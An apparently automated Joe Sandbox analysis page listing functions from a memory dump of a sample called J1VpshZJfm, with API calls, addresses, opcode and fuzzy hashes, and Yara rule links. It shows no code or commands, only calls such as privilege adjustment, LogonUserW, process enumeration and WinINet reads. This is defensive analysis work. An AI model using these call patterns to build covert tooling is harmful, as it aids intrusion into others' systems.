API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: d01d9e04cec89b94746b776d1c086677caa676f03a98e9757af2e6cd53e179bf
Instruction ID: 3d00bbb331484d8abda393a6429f9f6df63280e845d08f5f29a902819cfb029d
Opcode Fuzzy Hash: d01d9e04cec89b94746b776d1c086677caa676f03a98e9757af2e6cd53e179bf
Instruction Fuzzy Hash: CB110431700914AFDB205F26DC44BAEBBDAEF84BA0F458029F845D3241CB70DC41AAA0

Function 00EE80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EE80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EE80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EE80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EE80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EE80F6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f9dfb256cabe69f73af1d9672362d5e7a600316cfa7ed44aa952fd4c60c39c90
Instruction ID: 351a3b32dcb27a27ee09439f68c630d3e1da3df147441baa5ce40dbd7011db08
Opcode Fuzzy Hash: f9dfb256cabe69f73af1d9672362d5e7a600316cfa7ed44aa952fd4c60c39c90
Instruction Fuzzy Hash: C6F0C270241208BFEB104FA5EC8CEA73BACEF49758F004029F909D2160CB609D05EA60

Function 00E94B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E94AD0), ref: 00E94B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E94B57

Strings

GetNativeSystemInfo, xrefs: 00E94B51
kernel32.dll, xrefs: 00E94B40

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 954a20a5e472bbab78804bdc8856654e8f0f43a4b0553afabb5077e2b1eea274
Instruction ID: 2b388d9e153c0883410fceeb311a194b6e8d2df789d99b8656b0c4258e55fded
Opcode Fuzzy Hash: 954a20a5e472bbab78804bdc8856654e8f0f43a4b0553afabb5077e2b1eea274
Instruction Fuzzy Hash: 19D0C270A00B17DFCB20CF31E828B8272E4AF40358B11C83A9485E2190E670D4C4D614

Function 00F0EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F0EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00F0EE4B

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Process32NextW.KERNEL32(00000000,?), ref: 00F0EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F0EF1A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 1689b92a1415d911cb4db172eaeceb39a2513c4cfd3e2fec55967178f3473021
Instruction ID: 0fc3b810b2500aa2f68ae96dc93ba70ce79c1362bf10a6934f884abb93c5df7d
Opcode Fuzzy Hash: 1689b92a1415d911cb4db172eaeceb39a2513c4cfd3e2fec55967178f3473021
Instruction Fuzzy Hash: 6051A571504315AFD710EF24CC81E6BB7E8EF94710F40581DF995A72A2EB70D908DB92

Function 00EEE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EEE628

Strings

(, xrefs: 00EEE66E
|, xrefs: 00EEE658

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 6d18757c41c7e837c943b124443d2878dc6b8b287f206802e247f489697d3b95
Instruction ID: 8517e7dfc20b66d67738573e8a44dca49e404145627af1afe07b5a37f5dbf5f8
Opcode Fuzzy Hash: 6d18757c41c7e837c943b124443d2878dc6b8b287f206802e247f489697d3b95
Instruction Fuzzy Hash: 2F323675A007059FDB28CF19C4819AAB7F1FF48320B15D46EE89AEB3A1E770E941CB40

Function 00F022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F0180A,00000000), ref: 00F023E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F02418

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 6115a8144e82b851111edc0dac4d48e969cec842d48737ab2f219be8aa3b9931
Instruction ID: 27a34dd07614f7e0341520192e18c5205eb90fc8a28057850fcf899707aa6cb0
Opcode Fuzzy Hash: 6115a8144e82b851111edc0dac4d48e969cec842d48737ab2f219be8aa3b9931
Instruction Fuzzy Hash: FA41D776904209BFEB60DE95DC89FBFB7BCEB40724F10406AF605A61C1DA749E41B670

Function 00EFB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EFB40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EFB465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EFB4B2

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a93c2af389b102829d7fba9ff0d5eb73b3756e2f0147f9a537b010ae6ed09cbc
Instruction ID: 9619330ca8f704eff81ba39b8c8913e92be9afdc05201e74a255054b8dfd9def
Opcode Fuzzy Hash: a93c2af389b102829d7fba9ff0d5eb73b3756e2f0147f9a537b010ae6ed09cbc
Instruction Fuzzy Hash: 0C215E35A0010CEFCB00EFA5D880AEDBBF8FF49314F1480AAE905AB352DB319915CB50

Function 00EE87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00EB0DB6: std::exception::exception.LIBCMT ref: 00EB0DEC
Part of subcall function 00EB0DB6: __CxxThrowException@8.LIBCMT ref: 00EB0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EE882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EE8858
GetLastError.KERNEL32 ref: 00EE8865

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 1771d2079b53362b333bb9f1ec351a81b8cae7c9aa0ee15d8f3139dd241d1095
Instruction ID: 8220124815cf29d84e130db222d4b95714ee91dccaaa622febd1b62281a28d32
Opcode Fuzzy Hash: 1771d2079b53362b333bb9f1ec351a81b8cae7c9aa0ee15d8f3139dd241d1095
Instruction Fuzzy Hash: 9D118FB2414208AFE718DFA5DD85DABB7F8EB44710B60952EF859A7251EB30BC408B64

Function 00EE874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE878B
FreeSid.ADVAPI32(?), ref: 00EE879B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: eaa7f2c21fd08c8824fd5fc76ea5beb40500dfd1993495921c8b1434ad48e258
Instruction ID: 8a8f823a83cc72f3800ac43fd849752e2a969b7904d7d50f743334e120634ff0
Opcode Fuzzy Hash: eaa7f2c21fd08c8824fd5fc76ea5beb40500dfd1993495921c8b1434ad48e258
Instruction Fuzzy Hash: CFF04975A1130CBFDF00DFF4DD89AEEBBBCEF08311F1084A9A901E2191E6716A489B50

Function 00EF4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00EF4CB3

Strings

DOWN, xrefs: 00EF4C98

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 0914f4dbd6dcbb51b24321d19fdc548ae4bc28f2fa8527477e26952c871cc3a6
Instruction ID: d653cf49a2740577df44add58ec8dcc45609feaf72e3d603a34d98d558edf99c
Opcode Fuzzy Hash: 0914f4dbd6dcbb51b24321d19fdc548ae4bc28f2fa8527477e26952c871cc3a6
Instruction Fuzzy Hash: 67E0867119D7213CF9042919BC03EF7078C8B127357112106FE10F50C1ED80AC8234BD

Function 00EFC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EFC6FB
FindClose.KERNEL32(00000000), ref: 00EFC72B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 09dfd7cf1eb88c95caabb173bb860716daba428a6b7cb06758935887f88b1beb
Instruction ID: 2b4c3ccc512f7474d4e936cd5cab2db5db1282e49c53d05f8c4684a24e6f03b4
Opcode Fuzzy Hash: 09dfd7cf1eb88c95caabb173bb860716daba428a6b7cb06758935887f88b1beb
Instruction Fuzzy Hash: FF11A1726006089FDB10EF29C845A6AF7E8FF85324F10891EF9A9D7291DB30AC05CF81

Function 00EFA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F09468,?,00F1FB84,?), ref: 00EFA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F09468,?,00F1FB84,?), ref: 00EFA0A9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7dd5bd23d80324a62c3a8382e30107a08f7a10521487a1a04d5a2e21ec16cd9d
Instruction ID: f258b91c6af862360bec862eb93733e5f5e9a803358533dcdef3f0d902b8de3f
Opcode Fuzzy Hash: 7dd5bd23d80324a62c3a8382e30107a08f7a10521487a1a04d5a2e21ec16cd9d
Instruction Fuzzy Hash: 85F0A73511522DBBDB219FA4DC48FFA77ACFF09361F008165F919E7181DA309944CBA1

Function 00EE81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EE8309), ref: 00EE81E0
CloseHandle.KERNEL32(?,?,00EE8309), ref: 00EE81F2

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b825ff00740dc7aa92da03b1af8e945533fec2090e74f10fa74b2fab29b4ecb1
Instruction ID: 57af993d3ea93e9328ae502e13a8c7e705c80563e754284fd2980066224f2001
Opcode Fuzzy Hash: b825ff00740dc7aa92da03b1af8e945533fec2090e74f10fa74b2fab29b4ecb1
Instruction Fuzzy Hash: 87E0EC72011610AFEB252B61EC09DB77BEAEF04354B15D92DF8AA94470DB62AC91EB10

Function 00EBA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EB8D57,?,?,?,00000001), ref: 00EBA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EBA163

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a2a81dbdeb76e05eae47ad63c6bb3d823393efc8495b13171837787132091dff
Instruction ID: 4c83285f76b5c7d9b6f86b8e58c8c1241c2d6e2f5a4a2cc84cd30e1230c8685d
Opcode Fuzzy Hash: a2a81dbdeb76e05eae47ad63c6bb3d823393efc8495b13171837787132091dff
Instruction Fuzzy Hash: 61B0923105420CEBCA002B91EC19BC83F68FB44BA2F418020F61D84060CB625454AA91

Function 00E9E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00ED3E62

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: f75332c1243c99fc2c2c6ff131484318906a9cc98425dae37d4676b29da9faaf
Instruction ID: 2b53ea870a4725bd8d4dd572ee7754a9184cfbd52bdacdc23cf3e867c4b46bc8
Opcode Fuzzy Hash: f75332c1243c99fc2c2c6ff131484318906a9cc98425dae37d4676b29da9faaf
Instruction Fuzzy Hash: 8DA26975A00209CFCF24CF58C480AAAB7B2FB59314F64906AEA55BB351D771ED42CB91

Function 00EBF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae939eabe8177f06b43b405654f1aa73a2419b1db92978af65633b41aa56017
Instruction ID: d2e3329fa184ad635cad17c4f30fd675a3f4defbf498588a565548cf9bd8841d
Opcode Fuzzy Hash: fae939eabe8177f06b43b405654f1aa73a2419b1db92978af65633b41aa56017
Instruction Fuzzy Hash: 4C32F332D29F454DD7239638DC32376A249AFB73C9F15E737E819B59AAEB28C4835100

Function 00EC242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3921ffe2294233f0c1f39f41b9eb34aa379acd7cd2ebe6bee85c4ecbc563a1e3
Instruction ID: 780c22818a8316adcb24ca192425e1a7be89f5c1051bc20f04a384b17d87fcdc
Opcode Fuzzy Hash: 3921ffe2294233f0c1f39f41b9eb34aa379acd7cd2ebe6bee85c4ecbc563a1e3
Instruction Fuzzy Hash: 3BB1F021E2AF454ED323A6398831336BA5CAFBB2D5F51D71BFC2670D22EB2285835141

Function 00EF8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00EF889B

Part of subcall function 00EB520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EF8F6E,00000000,?,?,?,?,00EF911F,00000000,?), ref: 00EB5213
Part of subcall function 00EB520A: __aulldiv.LIBCMT ref: 00EB5233

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 30c3f7e7931f3a4f834ea957e339d42addb997462b4b9f9d1d5eef5e47482ddc
Instruction ID: f85bb40c62f76d06dc9add6e256db387040925f7dae0b736993734fee3cfee7a
Opcode Fuzzy Hash: 30c3f7e7931f3a4f834ea957e339d42addb997462b4b9f9d1d5eef5e47482ddc
Instruction Fuzzy Hash: 4C21B4326356148BC729CF39D841A62B3E1EFA5311FA89E6CD2F5CB2D0CA34B905DB54

Function 00EE87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EE8389), ref: 00EE87D1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c1447fef935af62a9e2ebf26da6e1692df4f3c22e7982b9eb9b389735ac1df28
Instruction ID: a0e4e8befddc59c4ac27d3b80463310fbc465fd1f769e11c7fe5bd037f4d83aa
Opcode Fuzzy Hash: c1447fef935af62a9e2ebf26da6e1692df4f3c22e7982b9eb9b389735ac1df28
Instruction Fuzzy Hash: AFD09E3226450EABEF019EA4DD05EEE3B69EB04B01F408511FE15D51A1C775D935AF60

Function 00EBA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EBA12A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
